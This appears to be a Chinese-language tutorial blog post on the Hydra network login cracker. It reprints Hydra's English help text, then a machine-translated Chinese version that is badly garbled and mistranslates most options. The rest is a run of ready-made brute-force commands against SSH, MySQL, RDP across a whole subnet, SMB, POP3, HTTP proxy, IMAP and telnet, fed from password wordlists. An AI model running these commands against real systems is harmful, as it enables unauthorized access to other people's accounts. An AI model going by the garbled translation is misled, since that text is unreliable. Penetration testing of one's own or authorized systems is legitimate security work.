Hydra初识
Hydra词出自希腊神话,原意是是九头蛇,后被赫拉克罗斯所杀,成为赫拉克罗斯的12件伟大功绩之一。而在计算机上HC-HYDRA是一个支持多种网络服务的非常快速的网络登陆破解工具。支持ssh,RDP,Mysql,Oracle,http,FTP等诸多协议的暴力破解
hydra参数详解
root@kali:~# hydra -h
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvVd46] [service://server[:PORT][/OPT]]
Options:
-R restore a previous aborted/crashed session
-S perform an SSL connect
-s PORT if the service is on a different default port, define it here
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-x MIN:MAX:CHARSET password bruteforce generation, type "-x -h" to get help
-e nsr try "n" null password, "s" login as pass and/or "r" reversed login
-u loop around users, not passwords (effective! implied with -x)
-C FILE colon separated "login:pass" format, instead of -L/-P options
-M FILE list of servers to attack, one entry per line, ':' to specify port
-o FILE write found login/password pairs to FILE instead of stdout
-f / -F exit when a login/pass pair is found (-M: -f per host, -F global)
-t TASKS run TASKS number of connects in parallel (per host, default: 16)
-w / -W TIME waittime for responses (32s) / between connects per thread
-4 / -6 prefer IPv4 (default) or IPv6 addresses
-v / -V / -d verbose mode / show login+pass for each attempt / debug mode
-q do not print messages about connection erros
-U service module usage details
server the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
service the service to crack (see below for supported protocols)
OPT some service modules support additional input (-U for module help)
语法:九头蛇[ [ [登录] [文件| L P通过| P文件] [ C ] |文件] ] [电子] [文件] - [任务] [ T M文件[任务] ] [ T·W时间] [ w时间] [ ] [ ] [端口X分钟:麦克斯:字符集] [ suvvd46 ] [服务:/ /服务器[:端口] [选择] ]
选项:
?恢复先前中止/崩溃会话
-执行SSL连接
如果该服务是在不同的默认端口,定义它在这里
l登录或L文件登录的登录名,或装入几个登录文件
?通或-文件尝试密码,或加载几个密码从文件
X分钟:麦克斯:字符密码暴力破解的一代,键入"X H"得到帮助
E NSR尝试"N"空密码,登录通过"S"和/或"R"的反复登录
?用户循环,而不是密码(有效!隐含的- *)
?文件结肠分离的"登录:通行证"格式,而不是-升/ -磷选项
?我的文件列表服务器攻击,每行一个条目,':'指定端口
o文件写入发现登录/密码对文件而不是stdout
?当一个登录/传递对被发现(-),在每个主机,-,-全球的
?任务的运行任务数的并联连接(每个主机,默认:16)
w / w的时间为反应时间(32S)/连接的每个线程
4 / 6选择IPv4或IPv6地址(默认)
v / v / D详细模式/显示登录+通过每个尝试/调试模式
Q不打印连接错误消息
?服务模块使用细节
服务器的IP或DNS,目标:192.168.0.0/24(这或-m选项)
服务的服务来破解(见下面的支持协议)
选择一些服务模块,支持额外的输入(-你的模块帮助)
0×01.暴力破解SSH
root@kali:~# hydra -l root -P /root/pass.txt -t 10 -vV -e ns 10.211.55.35 ssh
0×02.暴力破解Mysql
root@kali:~# hydra -l root -P pass.txt -o savessh.log -f -vV -e ns 10.211.55.10 mysql
0×03暴力破解3389
root@kali:~# hydra 10.211.55.1/24 rdp -l administrator -P pass.txt -V
其他的破解
0×04.破解smb:
# hydra -l administrator -P pass.txt 10.36.16.18 smb
0×05.破解pop3:
# hydra -l muts -P pass.txt my.pop3.mail pop3
0×06.破解http-proxy:
# hydra -l admin -P pass.txt http-proxy://10.36.16.18
0×07.破解imap:
# hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
# hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN
0×08.破解telnet
# hydra ip telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V